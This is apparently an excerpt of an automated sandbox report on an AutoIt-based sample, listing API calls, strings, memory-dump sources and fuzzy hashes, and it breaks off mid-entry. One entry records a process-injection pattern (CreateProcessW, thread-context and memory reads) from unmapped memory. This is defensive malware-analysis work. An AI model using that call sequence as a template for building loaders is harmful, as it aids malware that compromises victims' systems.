                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,00EE3AA3,?), ref: 00EE3724
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateShow
                                                                                        • String ID: AutoIt v3$edit
                                                                                        • API String ID: 1584632944-3779509399
                                                                                        • Opcode ID: 1960627a7c26f3eb29baee9f7dcb6dda661f612727e687b99d619a21ab766492
                                                                                        • Instruction ID: 349b5f598721ba840373921f0b28ef02ef7af583baabbe0958a902a43484a0e4
                                                                                        • Opcode Fuzzy Hash: 1960627a7c26f3eb29baee9f7dcb6dda661f612727e687b99d619a21ab766492
                                                                                        • Instruction Fuzzy Hash: 80F0DAB1A402E87AE7315757AC08E673E7DE7C7F60F02801FFA09A21A1C5650895EAB1

Control-flow Graph

Control-flow graph (graph rendering omitted): function entry 1058088; basic blocks call 1055cd8, 1057f78, CreateFileW, VirtualAlloc, ReadFile, 1057fb8, 1056f78, 1058008 and ExitProcess, with the exit path at 1058287.
                                                                                        APIs
                                                                                          • Part of subcall function 01057F78: Sleep.KERNELBASE(000001F4), ref: 01057F89
                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010581C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2160099918.0000000001055000.00000040.00000020.00020000.00000000.sdmp, Offset: 01055000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1055000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileSleep
                                                                                        • String ID: VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6
                                                                                        • API String ID: 2694422964-3665809092
                                                                                        • Opcode ID: ec41e43490c183e320d94f9895a2e132943fb27c6d4df2e25e4c6a212d8a34c3
                                                                                        • Instruction ID: aa961273c33358362841cdedaa66fca96b085004123730e1663c15a043978ce4
                                                                                        • Opcode Fuzzy Hash: ec41e43490c183e320d94f9895a2e132943fb27c6d4df2e25e4c6a212d8a34c3
                                                                                        • Instruction Fuzzy Hash: 07617070D04288DAEF11D7B8D848BEFBFB49F15304F048199EA987B2C1C7B90A49CB65

Control-flow Graph

Control-flow graph (graph rendering omitted): function entry ee4139; the graph contains only internal subcalls (ee41a9, f2c396, ee4252, eff4ea, ee496c, f01c9d, eec833, ee4f30, eebbfc, f29cab, eeba85, ee4dd9 and others) and no direct Win32 API calls; the APIs reached through those subcalls are listed below.
                                                                                        APIs
                                                                                          • Part of subcall function 00EE41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00EE39FE,?,00000001), ref: 00EE41DB
                                                                                        • _free.LIBCMT ref: 00F536B7
                                                                                        • _free.LIBCMT ref: 00F536FE
                                                                                          • Part of subcall function 00EEC833: __wsplitpath.LIBCMT ref: 00EEC93E
                                                                                          • Part of subcall function 00EEC833: _wcscpy.LIBCMT ref: 00EEC953
                                                                                          • Part of subcall function 00EEC833: _wcscat.LIBCMT ref: 00EEC968
                                                                                          • Part of subcall function 00EEC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00EEC978
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                        • API String ID: 805182592-1757145024
                                                                                        • Opcode ID: caf033b8c19055b28c2cf6a6a34d7fad4fe60bc7ebdbcec40e3c1fdac3ec0498
                                                                                        • Instruction ID: 671471feacd704172f3c3c7fa547d0ab9cb9e884cb33853742758be9615cac65
                                                                                        • Opcode Fuzzy Hash: caf033b8c19055b28c2cf6a6a34d7fad4fe60bc7ebdbcec40e3c1fdac3ec0498
                                                                                        • Instruction Fuzzy Hash: 7C91A27191025DAFCF04EFA9CC919EEB7B4BF08350F144429F916BB291EB74AA09DB50
                                                                                        APIs
                                                                                          • Part of subcall function 00EE5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FA1148,?,00EE61FF,?,00000000,00000001,00000000), ref: 00EE5392
                                                                                          • Part of subcall function 00EE49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00EE4A1D
                                                                                        • _wcscat.LIBCMT ref: 00F52D80
                                                                                        • _wcscat.LIBCMT ref: 00F52DB5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$FileModuleNameOpen
                                                                                        • String ID: \$\Include\
                                                                                        • API String ID: 3592542968-2640467822
                                                                                        • Opcode ID: efa52121d84fcd2d972d8779934b7084008f26fcf935a1469de0e62c46abb729
                                                                                        • Instruction ID: cf50383bfd60539f54f41ef41cc15957c47d4d95d075582a3b238168aa7c1bea
                                                                                        • Opcode Fuzzy Hash: efa52121d84fcd2d972d8779934b7084008f26fcf935a1469de0e62c46abb729
                                                                                        • Instruction Fuzzy Hash: 465197F26043889FC394EF5EDC8195AB3F4FF5A300B40552EF64993261EB309508EB52
                                                                                        APIs
                                                                                        • __getstream.LIBCMT ref: 00F034FE
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00F03539
                                                                                        • __wopenfile.LIBCMT ref: 00F03549
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                        • String ID: <G
                                                                                        • API String ID: 1820251861-2138716496
                                                                                        • Opcode ID: 3a186ef3394e64cb10c929f82b23ee97a02d9577e6e9153a5e690b005da2ab56
                                                                                        • Instruction ID: df7f2ff8663b2ce8345bf103bd3b44c9e640d527d2c29ccbb2a1101d492d95a1
                                                                                        • Opcode Fuzzy Hash: 3a186ef3394e64cb10c929f82b23ee97a02d9577e6e9153a5e690b005da2ab56
                                                                                        • Instruction Fuzzy Hash: 41110A75E003069BEB61FF718C4267E37A8AF45360B188825E415CB2D1EB38DA11B7A1
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00EFD28B,SwapMouseButtons,00000004,?), ref: 00EFD2BC
                                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00EFD28B,SwapMouseButtons,00000004,?,?,?,?,00EFC865), ref: 00EFD2DD
                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,00EFD28B,SwapMouseButtons,00000004,?,?,?,?,00EFC865), ref: 00EFD2FF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: Control Panel\Mouse
                                                                                        • API String ID: 3677997916-824357125
                                                                                        • Opcode ID: da4397fb59ae4e536ab6ccc0655c2e8bfb9bebf4dcd647468bdc00c1e2d07a40
                                                                                        • Instruction ID: 9b19dee4fc2ff0ba67a21e15dc2d71cca5d112b85349ed7faeade0ac77ef8c27
                                                                                        • Opcode Fuzzy Hash: da4397fb59ae4e536ab6ccc0655c2e8bfb9bebf4dcd647468bdc00c1e2d07a40
                                                                                        • Instruction Fuzzy Hash: 9D115A75A1520CFFDB118F64CC84EBE7BB9EF44744B005429EA01E7120D6719E40AB60
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01057733
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010577C9
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010577EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2160099918.0000000001055000.00000040.00000020.00020000.00000000.sdmp, Offset: 01055000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1055000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                                        • Instruction ID: 0337a94615ec5550e4d59b847ddc85448ea3585e9d58db4808329cb44a9f1b14
                                                                                        • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                                        • Instruction Fuzzy Hash: C4620930A14218DBEB64CFA4C840BDEB776EF58300F5091A9D64DEB390E7799E81CB59
                                                                                        APIs
                                                                                          • Part of subcall function 00EE4517: _fseek.LIBCMT ref: 00EE452F
                                                                                          • Part of subcall function 00F2C56D: _wcscmp.LIBCMT ref: 00F2C65D
                                                                                          • Part of subcall function 00F2C56D: _wcscmp.LIBCMT ref: 00F2C670
                                                                                        • _free.LIBCMT ref: 00F2C4DD
                                                                                        • _free.LIBCMT ref: 00F2C4E4
                                                                                        • _free.LIBCMT ref: 00F2C54F
                                                                                          • Part of subcall function 00F01C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00F07A85), ref: 00F01CB1
                                                                                          • Part of subcall function 00F01C9D: GetLastError.KERNEL32(00000000,?,00F07A85), ref: 00F01CC3
                                                                                        • _free.LIBCMT ref: 00F2C557
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                        • String ID:
                                                                                        • API String ID: 1552873950-0
                                                                                        • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                                        • Instruction ID: 2316326460aae9ea347c621825c109a5c2aed61aa8290dc2fcf709eb96cabdcb
                                                                                        • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                                        • Instruction Fuzzy Hash: 30516EF1A04218AFDF149F64DC81BAEBBB9EF48300F10409EF659A7281DB755A809F58
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00EFEBB2
                                                                                          • Part of subcall function 00EE51AF: _memset.LIBCMT ref: 00EE522F
                                                                                          • Part of subcall function 00EE51AF: _wcscpy.LIBCMT ref: 00EE5283
                                                                                          • Part of subcall function 00EE51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EE5293
                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00EFEC07
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EFEC16
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F53C88
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1378193009-0
                                                                                        • Opcode ID: 759bfa3381f7ec76023357b752c2115fc14f5d7f4e37fa8121f86efd42069d77
                                                                                        • Instruction ID: baec4a5332cc00cf2c359998747de709ec2128443b191348316c3faf16db7207
                                                                                        • Opcode Fuzzy Hash: 759bfa3381f7ec76023357b752c2115fc14f5d7f4e37fa8121f86efd42069d77
                                                                                        • Instruction Fuzzy Hash: 3221DA719047989FE7329B28CC59BE7FBEC9B45309F04048DE79A66241C7B43A849B51
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F53725
                                                                                        • GetOpenFileNameW.COMDLG32 ref: 00F5376F
                                                                                          • Part of subcall function 00EE660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE53B1,?,?,00EE61FF,?,00000000,00000001,00000000), ref: 00EE662F
                                                                                          • Part of subcall function 00EE40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EE40C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                                        • String ID: X
                                                                                        • API String ID: 3777226403-3081909835
                                                                                        • Opcode ID: 1a33f7442889db73a72f0f8fcf94288c6cac5498a694298ae9476619c39c8dc1
                                                                                        • Instruction ID: 494135c103a314b11775e55a1e23f41626a1b38f0dcc2b44dc1afae088ec5cba
                                                                                        • Opcode Fuzzy Hash: 1a33f7442889db73a72f0f8fcf94288c6cac5498a694298ae9476619c39c8dc1
                                                                                        • Instruction Fuzzy Hash: 3421C3B1A1018CABDF11DF99D805BDEBBF89F49300F008019E505B7281DBB45A899F61
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00F2C72F
                                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F2C746
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Temp$FileNamePath
                                                                                        • String ID: aut
                                                                                        • API String ID: 3285503233-3010740371
                                                                                        • Opcode ID: 9665b6994aca2e8bd078c964c15be2d0057eb79444e253df01ce0574f9e9dcbf
                                                                                        • Instruction ID: 6d3768b43b1f74f1be27c67952a19539b0742fb7fce34a58a8b2ca2010faa4b8
                                                                                        • Opcode Fuzzy Hash: 9665b6994aca2e8bd078c964c15be2d0057eb79444e253df01ce0574f9e9dcbf
                                                                                        • Instruction Fuzzy Hash: 08D05E71A0030EABDB10AB90DC0EF8A776C9704704F0001A0B660E50B1DAF1E6999B55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7f4f97e977be49acccf4b9ddce60b6fcd6f693090d86c70ebde559466edba156
                                                                                        • Instruction ID: ce47d3b08519c15ec2e4be8fe29eac51598ad487df4ae5ed536ab3c32e14288e
                                                                                        • Opcode Fuzzy Hash: 7f4f97e977be49acccf4b9ddce60b6fcd6f693090d86c70ebde559466edba156
                                                                                        • Instruction Fuzzy Hash: FAF16B71A043459FC710DF24C885B6EB7E5BF88324F14892DF9999B392DB74E909CB82
                                                                                        APIs
                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00F03973
                                                                                          • Part of subcall function 00F081C2: __NMSG_WRITE.LIBCMT ref: 00F081E9
                                                                                          • Part of subcall function 00F081C2: __NMSG_WRITE.LIBCMT ref: 00F081F3
                                                                                        • __NMSG_WRITE.LIBCMT ref: 00F0397A
                                                                                          • Part of subcall function 00F0821F: GetModuleFileNameW.KERNEL32(00000000,00FA0312,00000104,00000000,00000001,00000000), ref: 00F082B1
                                                                                          • Part of subcall function 00F0821F: ___crtMessageBoxW.LIBCMT ref: 00F0835F
                                                                                          • Part of subcall function 00F01145: ___crtCorExitProcess.LIBCMT ref: 00F0114B
                                                                                          • Part of subcall function 00F01145: ExitProcess.KERNEL32 ref: 00F01154
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        • RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000001,00000000,?,?,00EFF507,?,0000000E), ref: 00F0399F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1372826849-0
                                                                                        • Opcode ID: 5818a722434dea69d7d8fac827b1c52ba314a0593245c89daf1cbc5a7f19bc7c
                                                                                        • Instruction ID: 8e93c80492db6d1eacb45c1b8cad086dbf549982c5ae63d7feeb33d9615b3584
                                                                                        • Opcode Fuzzy Hash: 5818a722434dea69d7d8fac827b1c52ba314a0593245c89daf1cbc5a7f19bc7c
                                                                                        • Instruction Fuzzy Hash: 3901B9367453159AF6113B28EC52B2A335D9F82770F21402AF505D72D1DFF4AD0076A1
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00F2C385,?,?,?,?,?,00000004), ref: 00F2C6F2
                                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F2C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00F2C708
                                                                                        • CloseHandle.KERNEL32(00000000,?,00F2C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F2C70F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                        • String ID:
                                                                                        • API String ID: 3397143404-0
                                                                                        • Opcode ID: 7b8939e249c5483f2eef1270a7c0e444d2165b26644b1fcd8eb71734d979b934
                                                                                        • Instruction ID: c37613215d00d0c9a17b2653b23a21d8cbc30ceb2382d6fe8ad4eae2133bb0ea
                                                                                        • Opcode Fuzzy Hash: 7b8939e249c5483f2eef1270a7c0e444d2165b26644b1fcd8eb71734d979b934
                                                                                        • Instruction Fuzzy Hash: AFE08632640228B7E7211B54AC0AFCE7B28AB05B70F104110FB24690E0D7F12511A798
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00F2BB72
                                                                                          • Part of subcall function 00F01C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00F07A85), ref: 00F01CB1
                                                                                          • Part of subcall function 00F01C9D: GetLastError.KERNEL32(00000000,?,00F07A85), ref: 00F01CC3
                                                                                        • _free.LIBCMT ref: 00F2BB83
                                                                                        • _free.LIBCMT ref: 00F2BB95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                        • Instruction ID: 4b9f8b0e7a2b9416bc8bf290c0c6801e60df1d7c5b38ce18737a6b8d2d39355d
                                                                                        • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                        • Instruction Fuzzy Hash: 8BE012A1A4175146EA2466B97E4CEF333CC5F44361714081DBD5AE7186CF28F840B9A4
                                                                                        APIs
                                                                                          • Part of subcall function 00EE22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00EE24F1), ref: 00EE2303
                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EE25A1
                                                                                        • CoInitialize.OLE32(00000000), ref: 00EE2618
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F5503A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3815369404-0
                                                                                        APIs
